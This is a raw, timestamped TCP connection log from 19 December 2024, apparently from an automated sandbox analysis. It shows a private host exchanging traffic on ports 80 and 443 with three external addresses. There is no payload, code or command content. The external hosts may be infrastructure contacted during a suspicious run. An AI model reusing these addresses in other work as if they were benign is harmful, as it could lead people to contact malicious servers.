Dec 19, 2024 10:10:13.872323990 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.873039961 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.873095036 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.873187065 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.873233080 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.873986006 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.874032021 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.874445915 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.874495029 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.875032902 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.875087976 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.875222921 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.875268936 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.876028061 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.876080990 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.876480103 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.876528025 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.877026081 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.877075911 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.877404928 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.877479076 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.877999067 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.878062010 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.878371000 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.878412008 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.878968954 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.879015923 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.879360914 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.879410028 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.879970074 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.880039930 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.880383015 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.880426884 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.880963087 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.881014109 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.881309032 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.881356955 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.881968021 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.882049084 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.882193089 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.882247925 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.882935047 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.882982016 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.883337021 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.883505106 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.884094000 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.884111881 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.884150028 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.884162903 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:16.049441099 CET	49878	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:16.049532890 CET	443	49878	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:16.049637079 CET	49878	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:16.053013086 CET	49878	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:16.053087950 CET	443	49878	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:16.102866888 CET	49856	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:16.103257895 CET	49879	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:16.223464012 CET	80	49879	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:16.223486900 CET	80	49856	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:16.223550081 CET	49879	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:16.223572969 CET	49856	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:16.223800898 CET	49879	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:16.343522072 CET	80	49879	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:17.268506050 CET	443	49878	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:17.268734932 CET	49878	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:17.270720005 CET	49878	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:17.270749092 CET	443	49878	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:17.271008015 CET	443	49878	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:17.320846081 CET	49878	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:17.358689070 CET	49878	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:17.358689070 CET	49878	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:17.358951092 CET	443	49878	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:17.559161901 CET	80	49879	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:17.559293032 CET	49879	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:17.568169117 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:17.568489075 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:17.688011885 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:17.688057899 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:17.688138008 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:17.688244104 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:17.688353062 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:17.808240891 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.031708002 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.031784058 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.031800032 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.031835079 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.031848907 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.031872034 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.031883955 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.031909943 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.031923056 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.031946898 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.031959057 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.031985044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.031995058 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.032033920 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.032329082 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.032341003 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.032377005 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.032388926 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.032413006 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.032422066 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.152168989 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.152230024 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.152295113 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.222770929 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.222817898 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.222847939 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.222882032 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.224931955 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.225023985 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.225094080 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.233319044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.233374119 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.233436108 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.241967916 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.242036104 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.242043972 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.242120028 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.250500917 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.250613928 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.250859022 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.251013994 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.258464098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.258505106 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.258570910 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.266839981 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.266884089 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.266954899 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.280239105 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.280289888 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.280308962 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.280453920 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.283452988 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.283521891 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.283544064 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.283586025 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.291994095 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.292076111 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.292088985 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.292133093 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.299577951 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.299664974 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.299736977 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.342448950 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.344151974 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.415733099 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.415759087 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.415822029 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.418265104 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.418370962 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.418420076 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.422704935 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.422804117 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.422869921 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.428316116 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.428369045 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.428445101 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.432046890 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.432094097 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.432106018 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.432424068 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.437091112 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.437117100 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.437175989 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.441533089 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.441665888 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.441720009 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.446244955 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.446269989 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.446327925 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.450958014 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.450989008 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.451039076 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.455686092 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.455724001 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.455769062 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.460498095 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.460522890 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.460572004 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.465220928 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.465245008 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.465295076 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.471792936 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.471817970 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.471874952 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.479737043 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.479763031 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.479815006 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.483834982 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.483994961 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.631227016 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.632077932 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.636111975 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636270046 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636287928 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636302948 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636318922 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636334896 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636343956 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.636353016 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636379004 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.636399031 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.636444092 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636462927 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636478901 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636496067 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636506081 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.636528015 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636538029 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.636543989 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636559963 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636567116 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.636574984 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636590958 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.636590958 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636600018 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.636607885 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636630058 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.636630058 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.636635065 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636643887 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.636651039 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.636693001 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.663008928 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.663032055 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.663101912 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.668725014 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.671747923 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.671812057 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.727664948 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.727688074 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.727864027 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.729228973 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.729245901 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.729263067 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.729298115 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.729315042 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.732944965 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.732963085 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.733016014 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.735230923 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.735291958 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.735343933 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.735346079 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.735369921 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.735395908 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.735411882 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.735418081 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.735429049 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.735433102 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.735445023 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.735460997 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.735461950 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.735471964 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.735477924 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.735492945 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.735495090 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.735502958 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.735523939 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.735534906 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.739758968 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.739784956 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.739836931 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.740818977 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.742721081 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.742758036 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.742775917 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.742820978 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.742835045 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.746206045 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.746222973 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.746237993 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.746268034 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.746304989 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.750117064 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.750134945 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.750183105 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.799190998 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.799336910 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.799371958 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.799457073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.800956964 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.801016092 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.801096916 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.801141977 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.804434061 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.804481030 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.804517031 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.804563046 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.807686090 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.807734966 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.807940006 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.807991028 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.811326981 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.811363935 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.811373949 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.811403036 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.814496040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.814544916 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.814609051 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.814651012 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.817779064 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.817826033 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.817974091 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.818022966 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.821223021 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.821341038 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.821392059 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.824542999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.824670076 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.824737072 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.828253031 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.828320026 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.828398943 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.828528881 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.831559896 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.831645012 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.831705093 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.834696054 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.834757090 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.834933043 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.834984064 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.838376999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.838460922 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.838485956 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.838537931 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.841458082 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.841598034 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.841645002 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.844932079 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.844953060 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.844984055 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.845000029 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.848186016 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.848304987 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.848371983 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.851557970 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.851620913 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.851705074 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.851789951 CET	49881	80	192.168.2.6	185.215.113.16
